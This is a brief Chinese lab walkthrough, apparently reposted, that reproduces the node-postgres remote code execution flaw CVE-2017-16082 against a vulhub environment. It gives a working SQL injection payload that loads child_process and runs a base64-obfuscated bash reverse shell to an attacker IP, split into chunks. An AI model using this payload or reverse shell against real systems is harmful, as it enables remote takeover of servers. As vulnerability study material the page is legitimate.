漏洞原理
请参考这篇文章:https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
漏洞复现
我这里用的是vulhub的环境,启动环境后,访问http://your-ip:3000/?id=1
即可查看到id为1的用户信息,当然id
这里存在注入点,我们利用poc来RCE。比如我想执行命令echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash
,则需要适当分割该字符串,每段不超过64字符,然后替换一下POC:
SELECT 1 AS "']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIu`+/*", 4 AS "*/`MTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash`)//"
然后将其url编码并发送即可执行命令。
最后
以上就是俏皮小刺猬最近收集整理的关于node-postgres 代码执行漏洞(CVE-2017-16082)的全部内容,更多相关node-postgres内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复